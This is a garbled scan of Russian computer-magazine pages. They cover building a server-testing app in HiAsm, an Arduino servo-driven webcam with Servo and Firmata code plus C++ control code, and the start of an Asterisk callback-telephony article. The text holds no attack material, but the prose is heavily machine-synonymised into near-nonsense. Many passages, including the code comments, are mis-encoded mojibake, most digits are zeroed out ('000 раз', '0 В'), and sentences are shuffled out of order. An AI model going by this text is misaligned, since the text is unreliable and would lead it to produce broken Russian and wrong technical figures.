Для этого ставим тальман среди кнопкой равным образом хабом (onClickÆ doStart равным образом onStart Æ doEvent1). Память(Memory) — позволяет беречь информация с потока для последующего использования. Логика: Арифметика(Math) — позволяет приводить в исполнение простые математические операции. В решении этой проблемы нам помогут пара новых элемента. которое выздороветь с момента вызова действие doStart прежде момента вызова действие doStop) будет выдано счетчиком во целый короб неразлучно со событием onStop. Поток-данные(DoData) — позволяет размещать произвольные данные во поток. расположенный нате вкладке «Интерфейс» (его паче просто-напросто назначать в режиме Редактора форм). тот или другой умеет сопоставлять в кругу с лица двоечка произвольных значения. ведь схема продолжит запросы для серверу. что такое? у него может присутствовать всего три входящих потока равным образом сам по части себе исходящий. В итоге получим схему. После запуска приложения убеждаемся. Для сего делать нечего сплотить азбука так. ко примеру) равным образом сбрасываешь ее в поуже существующую ÎÑÍÎÂÍÛÅ ÝËÅÌÅÍÒÛ Ниже привожу ряд основных элементов. ась? в среде счетчиком равным образом надписью появился вновь одиночный хаб со связью. Это компонента «Арифметика». идущей ко точке doClear элемента «Арифметика». ÇÀÑÒÀÂËßÅÌ ÂÑÅ ÝÒÎ ÐÀÁÎÒÀÒÜ. который умеет свершать простые математические операции. Удаляем деталь «Редактор текста» — спирт нам пуще отнюдь не нужен. в качестве кого показано на рисунке. представленную на иллюстрации. таким образом. Для сего задним числом наступления onDisconnect нужно призывать повторное включение ко серверу и отправку запроса вплоть до тех пор. При этом измеренное сезон (то лакомиться величина миллисекунд. расположен в ряду событием onStart счетчика времени да методом doEvent1 хаба. что такое? график работает. равным образом элемент «Условный блок». С помощью него пишущий сии строки будем таксировать время. доколе сие казус безграмотный произойдет сотый раз. Элемент «Арифметика» соединен своевольно из из себя точками Op1 и Result. Этот элемент по своему назначению почитай целиком эквивалентен элементу «Разветвитель». Последнее. который позволяет на качестве первого аргумента использовать ранее вычисленное роль и. При таком включении во оный момент. сверх которых не обходится едва ни одна схема. а также просматривать документация с потоков. Достаем не без; вкладки «Инструменты» деталь «Счетчик времени». Инструменты: Разветвитель(Hub) — позволяет перепутывать сколько-нибудь параллельных потоков на одиночный либо разветвлять одинокий полчище сверху небольшую толику последовательных. При таком включении отсадка doClear хорош обнулять счетчик вызова событий onDisconnect всяк крат затем вывода времени в форму. Первым автор сих строк будем вычислять контингент произошедших событий onDisconnect. когда сервер закроет связывание от нашим приложением. во противном случае — отобразит пора выполнения задачи. то убирать известный пространство схемы эквивалентен следующему коду: 028 Схема приложения тестирования сервера (шаг 0) if(x < 000) [âûçûâàåì doEvent1 ó õàáà] else [âûçûâàåì doStop è ñ÷åò÷èêà âðåìåíè] Также не запрещается заметить. Помощники -> Отладка(Debug) — позволяет на запущенной программе проверять исполнение методов равно событий. зачем неграмотный полно на схеме интересах выполнения нашей задачи — сие отправка запроса 000 крат подряд. во компонент «Надпись». Контролы -> Таймер(Timer) — позволяет совершать кус схемы через определенные интервалы времени. который появился получи последнем рисунке. Убедившись. В более сложных схемах спокон века иногда по части ряд возможных правильных вариантов включения элементов. сколько позволит пороть горячку кнопку отправки запросов несколько крат заподряд минуя рестарта приложения. что такое? оно отображает эпоха одного запроса. После вычисления следующего значения счетчика вывод передается во целый короб сообща с событием onResult. идущую за него. когда-когда твоя милость тянешь стройность ото точки элемента (от onDisconnect. которое да остановит счетчик. Его дальнейший суждение задан во свойствах равно равен 000. Условный блок(If_else) — позволяет уравнивать двуха значения между собой. и выбор какого-то одного с них хорош глядеть изо рук с достигнутого компромисса в обществе читабельностью схемы равно ее размером. например. Еще сам безвыгодный в такой степени осязаемый деталь во виде стрелки. которое соединено вместе с методом doCompare элемента «Условный блок». решающих определенную задачу. На простом языке программирования это можно было бы причислить одной строкой: x=x + 0. Если боец итерации дешевле 000. не возбраняется браться ко следующему этапу. из праздник лишь только разницей. водить подсчёт вызова перипетии onDisconnect. Он механично ставится на схему во оный момент. отправку запроса равно добыча данных. XÀÊÅÐ 00 /141/ 00 . находящихся в вкладке «Логика». Выведем содержимое потока вместе с сего события. а вторым — сличать сие количество с 000. которое ушло для сцепление от сервером. Цикл со счетчиком(For) — позволяет заданное сумма раз выполнить схему. произойдет событие onDisconnect. попали бы возьми doSend.PC_ZONE Схема приложения тестирования сервера (шаг 0) рые. а его схема doStop соединяем из событием onDisconnect элемента «TCP-клиент». пройдя вследствие «Разветвитель».

Не исключены опять же схемы со множеством лишних связей и элементов. известных под никами dilma (Дмитрий Власов. вместе с пошевеливайтесь разобраться во котором невыгодный сможет хоть поднаторевший разработчик. вкладывания на контейнеры равным образом т. зачем «и таково все XÀÊÅÐ 00 /141/ 00 работает». нежели аналогичные программы в других языках равно средах программирования. во вкусе равно кому только лишь не лень противоположный машина графического программирования. Например. например. что-нибудь схему изо 00 кубиков позволительно быстро обратить на хаос. аюшки? карта приложения будет принадлежать с приближенно 000-1000 элементов. что-то пошив равно простота схемного решения противоположно пропорциональны сложности элементов. аюшки? на разработки более-менее сложных приложений инженер программ отнюдь не подходит. наравне следствие. Могу вручить соседний совет: если бы твоя милость считаешь. является не столь наглядной. Так. почто такого никак не бывает в обычных языках — несложно визуальное конструирование к этому располагает на куда как большей степени. простая математическая формула. Последний штришок в нашей схеме — расквартирование плашек-комментариев для большей наглядности происходящего. Но. на которых нужно причинять бессчётно расчетов. во этом да заключается сердцевина важность HiAsm (ради которого. операций со строками да прочих «микро» процедур. следовать отсчет что-что многие схемы на HiAsm создаются за гораздо меньшее время. сетевых протоколов. хоть равным образом графический. равно как такового. Часть элементов палитры реализует поуже завёршенный функционал на выполнения конкретной не раз встречающейся задачи (скажем. с целью которого в качестве среды разработки с выгодой подбирать HiAsm. служебный сайт и форум HiAsm «нарисован» на нем самом да состоит изо к примеру 0000 элементов. что со самого азы привык получать готовое вотум на двоечка группа без участия заморочек не без; хелпом и прочими доками. которые ни за что малограмотный влияют сверху работу программы. ась? во палитре пакета глотать множество инструментов в целях масштабирования схемы (разбивка на модули. Производительность получаемого приложения на пакете Windows (именно симпатия рассматривается на данной статье) хоть равным образом очень зависит через используемого набора элементов. по образу сие нередко бывает. часть которых реализуется в последующих версиях конструктора. Несмотря в то. разрабатываемое сообществом русских программистов. Собственно. итак побольше громоздкой. Это значит. регулярно посещающие симпозиум равно предлагающие идеи. за глаза необходимости на знании языка программирования совершенно не исключает потребность на знании основ работы операционной системы. форматов и стандартов. реализованная несколькими кубиками. равно как правило. точная число до дна да сполна зависит от самого разработчика: так. nic (Николай Березников) и другие. чем аналогичная заметка во текстовом виде ежели и бы потому. nesco (Евгений Носов). Если а готового элемента нет. так очищать основ той предметной области. тутовник перевелся — возле любом расположении равным образом соединении элементов проект будет скомпилирована да запущена. интересах которой создается программа. сравнений. в таком случае понятки «синтаксическая ошибка». Отсутствие каких-либо ограничений бери предрасположенность и связывание элементов выливается на то. Помимо сего поглощать другое ограничение. iarspider (Иван Разумов).). так ее реализация.blogspot. собственно. чем подле использовании обычного языка программирования.com • Уроки визуального программирования: my-hiasm. Поскольку на HiAsm использование строится из готовых блоков равным образом связей в среде ними. равно был создан конструктор) — на потенциал накоплять домашние собственные программы помимо сведения каких-либо языков программирования.Схема приложения тестирования сервера (шаг 0) INFO Среда ради графического проектирования приложений — HiAsm связь в кругу двумя другими точками. Это. Но близ этом. Это так-таки как и код. начиная с определенного момента дальнейшее аугментация функционала (и.z info Проект HiAsm (или Конструктор программ) — сие открытое программное обеспечение. никак не следует чтобы решения задач. Неоценимый вклад на развитие проекта вносят да простые пользователи. изо которых строилось приложение. Если назначение пользователя хватит сложна равным образом безграмотный укладывается во граница стандартных элементов палитры. Иногда сие является неожиданным сюрпризом для пользователя. ведущий проекта).hiasm. HTTP://WWW links • Блог согласно HiAsm: hi-asm. математики да физики.д. ÌÀËÅÍÜÊÈÉ ÑÎÂÅÒ HiAsm в совершенстве к лицу пользу кого конструирования простых утилит. так оставлены на ней лишь потому. количества элементов) ведет к сильному падению читабельности схемы равным образом пониманию ее работы по причине образования большого числа связей. ведь велика шанс того. равно пользователю останется всего лишь хоть сколько-нибудь поменять ее.net.co 029 . связанное из максимально возможной сложностью проекта. безвыездно необеспеченность конструктора вытекают изо его достоинств. ÊÎÃÄÀ ÝÒÎ ÌÎÆÍÎ ÈÑÏÎËÜÇÎÂÀÒÜ? Вот эдак просто-напросто автор сих строк создали несложное. ась? нужная схема (или близкая для ней) ранее вкушать на примерах. так полезное сетевое приложение. Впрочем. что занимает нате экране вяще места.ru • HiAsm online: hion. а первый встречный шифр нужно комментировать. Происходит сие по причине того. никак не означает. в таком случае лучше обратиться ко традиционным средам программирования. для закачки файла с интернета равным образом сохранения его на диске). только по сию пору но на среднем вниз производительности аналогичного решения бери компилируемом языке программирования. однако. Будет ли возлюбленная быть этом делать — сие ранее нисколько второй вопросительный знак :).

принимать вид сотворить мастерящий девайс тогда равно в ту же минуту самой малой кровью. ïóòü äàæå ðîáîòà íà ñòîëå. И всетаки. Приступим? ×ÒÎ ÒÀÊÎÅ ARDUINO? Девайс. снабдив ее возможностью поворачиваться другой стороной во нужном направлении соответственно нашей команде. аюшки? шлепалка текущий в самом деле является C++. позаимствовать у товарища. Задача — проапгрейдить обычную веб-камеру. Общая геморрой программаторов во том. к счастью. отправить в рот полученные навыки во деле. êîòîðûå èç âñÿêîãî õëàìà ëîâêî äåëàþò ðîáîòîâ èëè ñèñòåìû êîíòðîëÿ äîñòóïà. зачем видный программатор безграмотный нужен. Программирование микроконтроллеров возьми базовом уровне — безграмотный такая уж равно сложная вещь. да прошивка пользовательских программ (так называемых скетчей) производится с Arduino IDE нажатием одной кнопки. постигнуть вагон материала. Более того. Если твоя милость стараясь безграмотный допустить ни слова читал замечательные статьи во «Фрикинге» по части этой теме. в таком случае вынужден заништяк сие понимать. посему автор сих строк малограмотный будем целую вечность пачкать теорию. дай тебе содеять в некоторой степени в сущности стоящее. ÷åì îòëè÷àåòñÿ òðàíçèñòîð îò êîíäåíñàòîðà. На каждой плате неотменно присутствуют линейный стабилизатор напряжения 0 В про питания микроконтроллера равным образом 06 МГц кварцевый резонатор.PC_ZONE Владимир Савинов à õî÷åòñÿ. — íàñòàë òâîé ÷àñ. задающий тактовую частоту работы микроконтроллера (МК). Нам важно знать другое. Êîãäà ïèñàòü îáû÷íûå ïðîãðàììû íàäîåäàåò. Все сии информация — всего только пользу кого общего развития. Но. à ìîæíî ñðàçó êóïèòü êîíòðîëëåð Arduino è äåéñòâîâàòü. Плата Arduino состоит изо микроконтроллера ATmega328 либо ATmega168 030 и нищенский элементной обвязки с целью программирования равным образом интеграции с другими схемами. интегрировать самому). придется немало попыхтеть. ïîðà ïåðåõîäèòü â äðóãóþ ëèãó. равно лишь только в дальнейшем выудить какой-то осязаемый результат. а за единый вздох покажем его во действии. кой наш брат перед этим назвали Arduino. Прелесть во том. — спросишь ты. саму Arduino допускается пускать в ход равно как программатор да насаживать пуговицы ею иные МК! Питаться Arduino может в качестве кого через внешнего постоянного напряжения 0-12В (то кушать подсоединить ардуину не возбраняется ото блока питания компьютера или XÀÊÅÐ 00 /141/ 00 . И во этом нам поможет замечательная создание — регулятор Arduino. сие значит. что их желательно круглым счетом схватить (купить. ÷òîáû êîä çàñòàâèë ðàáîòàòü ÷òî-òî ôèçè÷åñêîå. В микроконтроллер спервоначала прошивается загрузчик (бутлоадер). представляет на вывеску простую да удобную плату ввода/вывода со встроенной средой разработки на языке специальном языке Wiring. Для разных МК равно других нужд существует громада программаторов — от специализированных (шьет всего-навсего AVR) предварительно универсальных (шьет все). Суди сам: с тем загасить (прошить) программу во большинство микроконтроллеров требуются специальные устройства — программаторы. «В нежели фишка?». А теперь почувствуй разницу: для того Arduino программатор далеко не нужен. Прошивка может заливаться во нее вследствие общепринятый USB-шнурок. от простых (7 проводков ото LPT-порта для ножкам МК) давно сложных (часто и сами они построены получай МК). Разбираться на его основах было бы умопомрачительно скучно.com Âåá-êàìåðà íà ñåðâîïðèâîäàõ Ñîâìåùàåì ïðîñòîé êîä è æåëåçî ñ ïîìîùüþ Arduino Åñëè òû âñþ æèçíü çàâèäîâàë ãèêàì èç àìåðèêàíñêèõ ôèëüìîâ. благодаря тому отсутствует неважнецкий необходимости осваивать набор программ контроллера равным образом положительно выводить программу держи ассемблере. Ìîæíî íà÷àòü ñ ôèçèêè è óçíàòü.

рулей да вертолетных лопастей. ÓÏÐÀÂËßÅÌÀß ÊÀÌÅÐÀ Чтобы безграмотный оказываться голословным. ведь цифровые порточки Arduino позволяют коптеть из логическими 0 и 0. На схему контроля поступают сигналы управления. даже если хочешь сэкономить.д. в целях Arduino разрабатываются беспричинно называемые шилды — платы-дополнения (модули. Это первое.наша отправная точка ноутбука. Помимо сего почти открытой лицензией распространяется да схематическое изображение микроконтроллера. сие ординарный C++). Само заглавие Arduino является торговой маркой. Зачем дьявол нужен? Дело на том. GPS-шилд про взаимодействия вместе с GPS-приемниками. Приводить во течение наш брат ее будем вместе с через в такой мере называемых сервоприводов. Любая способ автоматизировать самую малость вместе с легкостью реализуется не без; Arduino! Выкладывать ритм сердцебиения во Twitter? Или сквозь инет удаленно запустить увлажнение цветов? Легко! Автоматизация аквариума.sparkfun. лишь несколькими строчками заключение позволительно обслуживать сервомашинками. Есть GSM-шилд интересах взаимодействия с сотовой сетью. талантливый вертеть конечный бегунок нате заданный угол равно давить его во этом положении. так чтобы некто начал исполнять какие-то задачи. в такой мере да с USB-порта компьютера. Нам доступны 04 цифровых вводов/выводов равно цифра аналоговых входов. Огромное величина и круг энтузиастов пишут пользу кого микроконтроллера программные библиотеки — своего рода модули.ru/shop/embedded/ arduino) или. что такое? потребно запомнить. ась? никаких дополнительных модулей к управления малограмотный требуется. да потому постоянно платы-клоны называются по-другому (хотя равно имеют в своем названии «duino»): например. Мы а настоящее попробуем еще одну отрасль. Все сие дает невероятную осуществимость в аляповатый платформе образовывать сложные и хитроумные девайсы. сервоприводы нужны на первую очередь. Зато сверх моторчиков управлять на перемещение легкую камеру позволительно до сей времени равным образом от через сервомашинок. красота Arduino никак не заканчивается во простоте подключения и легкости программирования перед него. Для сего нужно соображать порядочно вещей. Схема подает подача на моторчик да крутит им предварительно нужного угла (сопротивления резистора).д. равно как равно любому контроллеру. их не грех вливать для Arduino напрямую. цифровая отпирка во виде универсального ключа — до сей времени сие как ми видится вместе с через Arduino. Например. в этом месте очищать своя истина у обеих сторон. Сервомашинка — это мото-редуктор. Документация в Arduino доступна сверху официальном сайте Arduino (www. Arduino — сие жалованье ввода/ вывода. наоборот. Но вне программы микроконтроллер — сие безвыгодный побольше нежели бесполезная железка. но маломощную равным образом самую дешевую SG-90 дозволено отводить непосредственно ко USB. Простота во освоении Arduino привлекает новичков. вроде моторчиков. токмо аппаратные). Если никак не погружаться на подробности. моделистам. которыми может править микроконтроллер. Цена вопроса — через $30. Обычно в роли такого драйвера выступает чип L293D (именно сверху базе этой микросхемы построен Motor-шилд — дополнительная плата. Поэтому равно получается. Условие — произвести управляемую камеру да ворочать домиком ее обзора со компьютера. К сим выводам подключаются многие прочие девайсы. нужна только самоё платеж да USB-шнурок в виде A-B. В результате. ÊÀÊ ÓÏÐÀÂËßÒÜ ÑÅÐÂÎÏÐÈÂÎÄÎÌ? Вообще. Более того.com). например. Аналоговые входы позволяют считывать важность попытка на порту от точностью давно 0 мВ. Для того. Ethernet-шилд позволяет отвести Arduino ко компьютерной мережа равным образом аж коптеть на интерXÀÊÅÐ 00 /141/ 00 нете (клиентом иначе говоря сервером). нельзя не с позиции силы узел (так называемый драйвер). Разумеется. Любым а исполнительным устройствам подобно моторчиков требуются интересах работы энергетика куда как большие. которая использует чесалка Wiring (по сути. вызывают недовольство у профессиональных программистов микроконтроллеров. Но так чтобы приводить обычными моторчиками. батареек или — или аккумуляторов). Резистор подключен на схему контроля равно своим текущим сопротивлением сообщает относительно текущем положении вала. равно кроме того. кодовый замок или. весть малы (не побольше 00 мА на порт). датчиков да т. во которой круглым счетом силен микроконтроллер — робототехнике. которым ко ПК подключаются принтеры. которые твоя милость можешь отсоединить для своей программе. дабы вчинить коптеть не без; микроконтроллером.д. Программировать Arduino можно как бы с плоть от плоти среды — специальной Arduino IDE. Вообще пользу кого движения камеры дозволяется было бы использовать специальные моторчики. Freeduino. Приобрести оригинальную плату Arduino можно.cc). сообщающие. Разумеется. ÂÇßÒÜ È ÑÄÅËÀÒÜ Освоить работу вместе с микроконтроллером не запрещается положительно из-за единовластно вечер. неграмотный требующий близ этом паяльник. которые невероятно расширяют потенциал контроллера. В нашем распоряжении очищать веб-камера равно Arduino. вернет ее на место. слои умного дома. взаимодействовать вместе с компьютерной клавиатурой/мышкой и т. на Linuxcenter (www. Seeduino иначе свой по образу и подобию — CraftDuino.linuxcenter. равно как равно во любом холиваре. По сути. попробуем брать в полном смысле слова полезную задачу. И буде влить их напрямую ко МК. там замирает и. буде что-нибудь повернет возвышенность изо нужной точки. в чем дело? напрямую ко портам Arduino не возбраняется отводить только лишь обычные светодиоды (да да те нужно вовлекать сквозь токоограничивающий резистор). Короче говоря. который токи. питать сервомашинки (особенно мощные) самое лучшее через отдельного источника. Это дальнейший момент. Arduino превращается на дизайнер для быстрого прототипирования да воплощения во проживание самых безумных идей. для управления положениями закрылок. во каком-нибудь западном интернет-магазине (скажем. Плюс сервы на том. на какое поза нужно повернуть выходной шпиндель (и варистор соответственно). Приобрести сервомашинки позволено опять двадцать пять а во любом интернет-магазине электроники в соответствии с $5 следовать штуку. Arduino. Wi-Fi-шилд пользу кого работы со беспроводными сетями равным образом т. того у оригинального Arduino существует воз клонов. Вал мотор-редуктора черство связан от движком переменного резистора. где-то равно вследствие популярную среду программирования микроконтроллеров семейства AVR — WinAVR. www. так дьявол попросту сгорит. ÄÎÏÎËÍÈÒÅËÜÍÛÅ ØÈËÄÛ Впрочем. подключаемая ко Ардуино равно позволяющая обслуживать двумя моторчиками). При этом регулировать сервой архи без затей — у нее поглощать три провода: 031 . С их через автор можем подавать команды не так — не то наизнанку брать какие-то данные.Сервопривод стоимостью Схема подключения сев$5 ров ко Arduino Классическая доход Arduino .arduino. В последнем случае шифр надлежит строчить получи и распишись чистом C. его надлежит программировать. Это сложно.

// óêàçûâàåì ïîðò ïîäêëþ÷åíèÿ ñåðâû servo8.h> #include <Servo. Схема управления адски проста. за сигнальному проводу. тот или иной заставит серву совершать переломный момент ото 0 перед 080 градусов равным образом обратно: #include <Servo. что такое? у меня получилось. Берем Arduino или аналог (в моем случае — CraftDuino) да прямо-таки подключаем сервомашинки напрямую для плате соответственно схеме. дабы ворочать камерой. • подача +5 поворот (красный). приведенной держи картинке. что-нибудь первый шнур слаботочный — импульсы можно давать сам не без; лапти микроконтроллера. Чтобы удерживать определенную позицию — выброс надо повторяться. pos-=1) // îò 080 äî 0 ãðàäóñîâ { myservo. // ñåðâà ïîäêëþ÷åíà ê äåâÿòîìó ïèíó } void loop() { for(pos=0. // çàäàåì ôóíêöèþ-îáðàáîò÷èê ñîîáùåíèé Firmata. // ïåðåìåííàÿ äëÿ õðàíåíèÿ ïîçèöèè ñåðâû void setup() { myservo. pos < 080. } void setup() { // óñòàíàâëèâàåì âåðñèþ ïðîòîêîëà Firmata. Для взаимодействия вместе с программой нате ПК мы тоже невыгодный будем фантазировать принадлежащий велосипед. В нашем случае углы поворота сервомашинок мы будем посылать в области последовательному порту вместе с управляющей программы получай ПК. • вестовой (оранжевый/желтый/белый). Управление импульсное. беспричинно но по образу равным образом ленинка Servo. // èíèöèàëèçàöèÿ áèáëèîòåêè Firmata XÀÊÅÐ 00 /141/ 00 . же для деле изрядно просто. pos>=1.PC_ZONE Компиляция завершена Программа про управления камерой OpenCV . Задача упрощается еще и потому. В результате адски попросту не запрещается накатать код. } } ÏÈØÅÌ ÏÐÎÃÐÀÌÌÓ ÄËß ARDUINO Для того. На качалку первой сервомашинки прикрепим веб-камеру.attach(ANALOG_MESSAGE. 0). В результате недолгих экспериментов у меня получился нижеупомянутый адрес интересах Arduino.attach(8).h> Servo myservo. Как аз многогрешный сделано сказал. Firmata — сие протокол. // ñîçäàåì îáúåêò äëÿ êîíòðîëÿ ñåðâû // ìàêñèìàëüíîå êîëè÷åñòâî òàêèõ îáúåêòîâ — 0 int pos=0. С механикой разобрались. delay(15). Arduino не мудрствуя лукаво должна обрести ценность угла поворота равно поворотить нужную серву получи данный угол.write(pos).h> Servo servo7. îáðàáàòûâàþùàÿ àíàëîãîâûå ñîîáùåíèÿ Firmata void analogWriteCallback(byte pin.write(pos). pos +=1) // îò 0 äî 080 ãðàäóñîâ { // ñ øàãîì â 0 ãðàäóñ myservo. // îáúåêòû êëàññà Servo Servo servo8. Теперь закрепим первую серву получай качалке другой — возлюбленная отвечает вслед азимутальный девятина поворота. еще входит в не блещущий новизной комбинация библиотек Arduino IDE.attach(7). // ïîâîðà÷èâàåì ñåðâó íà óãîë value if(pin==8) servo8. которая достаточно откликаться ради высоту (широту) поворота камеры. нам понадобится двум сервомашинки. То есть управляющий количество продукции одной сервы подключаем для седьмому порту. зачем во комплекте штатных библиотек Arduino IDE поуже есть библиотека Servo ради управления сервомашинками (www. Вот равно целое :). servo7. int value) { if(pin==7) servo7. Все сие может звучать сложно. // óñòàíàâëèâàåì ïîëîæåíèå delay(15).write(value).begin(9600). для работы со сервомашинками снедать готовая книгохранилище Servo (идет в составе Arduino IDE). а воспользуемся готовой библиотекой Firmata. Firmata.глаза чтобы робота • вселенная (коричневый/черный).cc/en/ Reference/Servo). каковой ваш покорный слуга в области ходу поясню во комментариях: #include <Firmata.write(value). // äëÿ ðàáîòû ñ ñåðâîìàøèíêàìè // ôóíêöèÿ. Особая прелесть состоит на том. То. дозволено увидеть 032 Прошивка залита на картинке. а другой короче управляющая программа пользу кого ПК. позволяющий простым образом иметь контакты программе возьми контроллере Arduino из программами бери компьютере. analogWriteCallback). // æäåì 05 ìñ ïîêà ñåðâà çàéìåò íîâîå ïîëîæåíèå } // è îáðàòíî for(pos=180. которая.attach(9).arduino. а другой — для восьмому.setFirmwareVersion(0. осталось снарядить схему управления да черкануть двум программы: одна в целях Arduino.

Эта ленинка очень популярна после расчёт своей открытости да потенциал безвозмездно эксплуатировать во вкусе на учебных. OpenCV — сие набор данных. Также выведем на окошечко вместе с картинкой пару ползунков. Для сего необходимо запустить Arduino IDE. являющейся оберткой вкруг функXÀÊÅÐ 00 /141/ 00 Веб-камера бери двух сервоприводах ции OpenCV: cvWarpAffine(). 0). Но даже если когда так. собственно.net/ projects/winavr • Сообщество любителей Arduino во ЖЖ: community. скажут. Сервоприводы издают звук. ко которому она подключена («Tools Æ Serial Port»). Если целое все прошло хорошо.ru/blog/ computervision • WinAVR: sourceforge. кессон двигается! Работает! Если у тебя возникнет корыстолюбие сделать еще раз сходственный опыт. Бывалые фрикеры. Так наравне на дальнейшие мероприятия входит посоветовать сего миниweb-cam-бота единовластно объявлять объекты и следить из-за ними. который считывает позиция ползунков во управляющей программе и отправляет их во качестве команды сверху микроконтроллер: // ïîëîæåíèå ïåðâîé ñåðâû int A=0.zip). IplImage* dest=0. Это открытая библиотечка компьютерного зрения. // // ôóíêöèè-îáðàáîò÷èêè ïîëçóíêîâ // void myTrackbarA(int pos) { A=pos. z 033 .Ура. После завершения компиляции в строке состояния появится депеша «Done compiling». int Fmax=180. livejournal. Так что во моей конструкции робота веб-камеру пришлось завязать возьми боку. вместе с через которых будем регулировать положением сервомашинок. равным образом все. и план начнет прошиваться на МК.available()) // åñëè åñòü ñîîáùåíèÿ Firmata.processInput(). Остается всего приняться кнопку «Загрузить пьеса во Arduino». почто через минимальное промежуток времени твоя милость можешь надергать результат. пробуем его запустить. Фактически. однако ваш покорнейший слуга выбрал С++. так что? Главное. int Amax=180. Их да можно скачать изо инета (robocraft. прибрать свою версию платы через меню «Tools Æ Board». ведь чтобы работы из камерой ваш покорный слуга воспользуюсь библиотекой OpenCV (sourceforge.net/projects/opencvlibrary).DVD dvd Исходники прошивки ради Arduino и программы нате С++ ты найдешь нате диске. да — да.com/ ru_arduino Вот. зачем Arduino подходит нешто что для новичков. // çàïóñêàåì ôóíêöèè-îáðàáîò÷èêè } links Теперь данный доступный шифр компилируем да заливаем получившуюся программу во Arduino. // Firmata char buf[3]. buf[2]=(A >> 0) & 0x7F.arduino. // ïîëîæåíèå âòîðîé ñåðâû int F=0. которая до первой версии разрабатывалась на Центре разработки программного обеспечения Intel (причем российской командой в Нижнем Новгороде). Идея нехитрая: подключаемся ко веб-камере равным образом показываем то. ведь нате усвоение всей платформы у тебя еле ли уйдет сильнее одного вечера. sg. которая равно выполняет поворот изображения. ÓÏÐÀÂËßÞÙÀß ÏÐÎÃÐÀÌÌÀ Разработать программу интересах ПК твоя милость можешь бери любом удобном пользу кого тебя языке программирования. двигаем ползунки. а тогда пишущий эти строки приведу токмо функцию-обработчик. так на программе приходится сие реставрировать (поворачивать картинку сверху 00 градусов визави сторож стрелки). возможно. Каких-то серия часов — и ты еще можешь строить работающие девайсы. что такое? симпатия «видит».ru/files/ opencv/servobot/ servobot. Компилируем код. Эта мероприятие реализуется функцией rotate(). buf[0]=0xE0 | 0. Теперь минута истины. погрузка завершается сообщением «Done uploadling». buf[1]=A & 0x7F. механика равным образом электроника готовы! Осталось написать программу чтобы управления сим мини-роботом. засадить шифр да нажать на кнопку компиляции. где-то да коммерческих целях. Sleep(100).Send(buf. по прошествии времени назвать порт. Выбираем порт } HTTP://WWW void loop() { while(Firmata. Полный шифр программы твоя милость найдешь для диске.cc • Блог сообразно компьютерному зрению: robocraft. функций да классов чтобы обработки изображений алгоритмами компьютерного зрения. } • Документация по Arduino: www.

Система callback существует искони да предлагается многими VoIPкомпаниями. всего-навсего пользу кого подключения его для Asterisk потребуется VoIP-GSM шлюз. Первое. в дальнейшем зачем кемарить соединения. Да равным образом вообще. подключить двойка подворье телефона. во фолиант числе льготный сервер Asterisk. Можно. Asterisk полноте сердцем нашей системы. Штука удобная да будет простая в организации. огромное диссеминация получили программные продукты. Схема такая: твоя милость звонишь возьми определительный номер. элементарнее хорэ учредить и настроить по сию пору вручную. конечно. идеже установлен специальный сервер.  ýòîì ñëó÷àå íåò íåîáõîäèìîñòè íè â èíòåðíåòå. Elastix равно т. òû ñìîæåøü èñïîëüçîâàòü åãî òîëüêî ïðè íàëè÷èè Wi-Fi èëè 0G. Это называется обратным звонком. с тем однако заработало. с тем совместить их между собой. По этой причине SIP-номер. оный сбрасывает звонок да самопроизвольно перезванивает. В качестве номера допускается воспользоваться родной ячеистый номер. кой отдается до SIP. ê ñîæàëåíèþ. Выбор большой. ìîæíî îðãàíèçîâàòü ñèñòåìó callback. ×òîáû îáîéòè ýòó ïðèâÿçàííîñòü ê èíòåðíåòó. На него автор сих строк будем звонить. Есть обходный тракт — пустить в дело для XÀÊÅÐ 00 /141/ 00 . у 034 нас были двум статьи. путем кой автор будем звонить. Íî. Итак. ÌÈÍÈ-ÀÒÑ Если рядом слове «Мини-АТС» у тебя возникает организация из жутко дорогостоящим оборудованием. безвыгодный делать закупки SIP-номер. что касается нежели автор писали отдельные статьи. аз многогрешный теперь далеко не буду. Можно зайти нате сайт. дополнительное подразделение во цепочке только понизит устойчивость системы. Еще ровня замечаний. Про базовую установку сервера да первичную настройку. по России — третий.ru/magazine/xa/108/154/1. íè äàæå â VoIP-êëèåíòå. êîòîðàÿ áóäåò çâîíèòü îáîèì àáîíåíòàì ïî VoIP è ñâÿçûâàòü èõ ìåæäó ñîáîé. Тебе остается накопить частный PIN-код (выполнить авторизацию) и номер интересах звонка. так использовать постоянно — нет.asp).д. какой-никакой приходит за меди. и специальный обслуживание позвонит обоим абонентам. на Москву — другой. Помимо аппаратных АТС’ок. которое устанавливается на офисах.PC_ZONE Алексей «Aggressor» Соколов Ñáåðå÷ü òåëåôîííûé áàëàíñ Ïîäíèìàåì ñèñòåìó îáðàòíîãî äîçâîíà Callback Ñàìûé âåðíûé ñïîñîá ñýêîíîìèòü íà çâîíêàõ — èñïîëüçîâàòü IP-òåëåôîíèþ. Совсем другое ремесло — создать укромный сервис саму. Можно купить несколько равно быть звонках вслед грань пускать в дело один. предпочтительнее. безусловно. а они стоят дорого: примерно ото 0000 рублей из-за порт. а от ним могут затеплиться проблемы: получи и распишись древних и не весть древних АТС безвыгодный во всякое время работает распознавание Caller ID. иначе callback’ом. PDF-версии твоя милость найдешь для диске. Но тут придется докупить VoIPшлюз вместе с FXO-портом. что нужно совершить — сие оторвать равно зарегистрировать держи Asterisk местный городской номер. а пускать в ход рядовой аналоговый. оно ошибочно. Собственно.ru/magazine/xa/107/152/1. xakep. а да можешь прочитать их получай сайте (www. что-нибудь Asterisk у нас есть.asp равно www. которое нам ахти нужно. äàæå åñëè óñòàíîâèòü íà ìîáèëüíûé òåëåôîí êàêîé-íèáóäü Skype-êëèåíò. предположим. íè â ïðîäâèíóòîì òåëåôîíå. Но повторяться то. Я невыгодный рекомендую проэксплуатировать для наших целей сборки вроде TrixBox. Следующий деяние — складка (и настройка) аккаунта у VoIP-провайдера. Этим позволяется пустить в ход разок где-нибудь следовать границей во роуминге.xakep. открывая страницу такого сервиса во веб-браузере. Я ажно пользовался в своё время сим со мобильного телефона..

